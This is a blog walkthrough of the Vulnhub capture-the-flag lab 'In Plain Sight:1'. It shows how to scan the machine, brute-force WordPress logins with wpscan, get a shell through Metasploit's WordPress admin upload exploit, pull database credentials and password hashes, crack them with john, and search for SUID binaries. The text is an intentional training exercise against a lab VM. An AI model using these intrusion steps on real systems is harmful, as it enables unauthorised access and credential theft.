Hacking Articles|Raj Chandel's Blog: In Plain Sight:1: Vulnhub Walkthrough

In today’s article we will face an Intermediate challenge. Introducing the In Plain Sight:1 virtual machine, created by “bzyo_” and is available on Vulnhub. This is another Capture the Flag challenge where we have to escalate privileges to find the root flag to complete the challenge.

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

· Network Scanning

o netdiscover

o nmap port scan

· Enumeration

o FTP Enumeration

o Browsing HTTP Service

o Enumerating the wordpress

· Exploitation

o Get a meterpreter session

· Post exploitation

o Reading passwords from file

o Login into MySQL to find hashes

o Using john to crack the hashes

· Privilege escalation

o Using su command

o Finding password

o Checking for SUID

Walkthrough

Network Scanning

The first step is to identify the target. So, to identify our target we will use the following command:

netdiscover

Now we will use Nmap to gain information about the open ports and the services running on the target machine and for this, type the following command :

nmap -p- 192.168.43.8

From the nmap scan we can see that the Port 21, 22, 80 is open, it means we have the FTP, SSH and HTTP services running simultaneously. Firstly, let’s try enumeration with anonymous login on FTP.

After logging in anonymously, we can see that there is a file todo.txt. Download this file using the get command. The content of todo.txt file doesn’t seem to be useful. You can read the file by using cat command.

As FTP wasn’t useful to us, we can now browse the website to see if we can find some information. And for this, open the IP address in our browser.

This is an Apache2 Ubuntu Default page but after exploring it carefully we can see a line hinting to “/var/www/html/index.html”. So, let’s explore this page.

This page looks like a normal page but when we click anywhere on the page then it will lead us to the following new webpage :

As we can see that this webpage lets you to upload any image. So here we tried to upload the image and we succeed but when we try to upload a .php file the webpage give us an error. Upon exploring more, the URL of the webpage caught our attention and you can see that it looks like a hash so we copied it and tried to crack it by using john.

It was “goodluck”. At this point we were just being trolled.

We then tried to upload a simple .php file and when uploading a .php file we come across the follwoing error :

But this error leads us to a new page “upload.php”. Let’s check the source code of this page.

Yes! There is a comment at the end of the source code. And this is a base64 encoded text, so let’s try to decode it by using the following command :

echo c28tZGV2LXdvcmRwcmVzcw== | base64 -d

When the text is decoded, it looks like a directory or a webpage. But before exploring it let’s see if there are more pages or not. Hence, use dirbuster.

There are many pages and as the result shows us that CMS is wordpress, therefore, we can use wpscan to plough through the two specified pages that mentions wordpress. And for that use the following command :

wpcan --url "http://192.168.43.8/wordpress" --enumerate

Similarly, let’s enumerate the other page.

wpcan --url "http://192.168.43.8/so-dev-wordpress" --enumerate

As you can see in the above image there are three users. And we have there usernames, we can simply use bruteforce to find their respective passwords and for that type :

wpscan --url "http://192.168.43.8/wordpress" -U bossperson -P /usr/share/wordlists/dirb/common.txt

Alas, we couldn’t find any password but not to worry as we can run the same command for the other page, let’s try it by typing :

wpscan --url "http://192.168.43.8/so-dev-wordpress" -U admin,mike -P /usr/share/wordlists/dirb/common.txt

And so, we finally found the password for the user admin. So now, let’s try to upload a shell using msfconsole. And through Metasploit we will use exploit/unix/webapp/wp_admin_shell_upload.

Once the exploit is initiated, type the set of following commands :

set PASSWORD admin1

set RHOST 192.168.43.8

set USERNAME admin

set TARGETURI /so-dev-wordpress

exploit

As you can see, we are successful in getting our session, lets move onto shell of the target system and for that type shell and hit enter. And the next thing you know is you are in the shell of the target system. Now to get a proper authenticated session of shell type the following command :

python3 -c ‘import pty;pty.spawn(“/bin/sh”)’

As we have managed to get a shell. So now, we will explore the system more to find some useful files.

Upon changing the directory, we found wp-config.php. as it is a config file, there’s bound to be usefull information. Thus, we will try to read it’s content using the cat command :

cat wp-config.php

These credentials are of mysql as you can see the prefix DB used which probably stands for DataBsase. So, we can try to login into mysql using these credentials and therefore, use the following commands :

bash // (to get a shell)

mysql -u sodevwp -p;

Yes, we are in! Let’s try and explore it further.

We found a database “sodevwp” and hence, to change the database type :

show databases;

use sodevwp

show tables;

select * from sodevwp_users;

Once the above commands are used successfully, you will find the following two hashes :

$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA. (for user admin)

$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01 (for user mike)

We will now use john the riper with rockyou wordlist to crack these hashes and for that type :

john cracker -wordlist=/usr/share/wordlists/rockyou.txt

As you can see in the image above that we found our passwords to the two major users and those are :

admin:admin1

mike: skuxdelux

Now, try and switch the user to mike and you can observe in the image below that you can successfully do that; which means cracking the passwords was successful.

Let’s move on for privilege escalation. Now, when you change your directory to /home and there you found a new user “joe”

And without wasting any time we traversed through etc/passwd

With etc/passwd we found out that password to ‘joe’ is SmashMouthNoThanks. So now, lets switch the user to joe with the foretold password.

And just like that we have the access of the user ‘joe’.

Now to move forward the only thing we have to do is to get the last flag of the target. And to get the it we check for SUID using the command find. -perm /4000. Before executing this command, we will change our directory to “/” and after running the command we find the following useful binaries.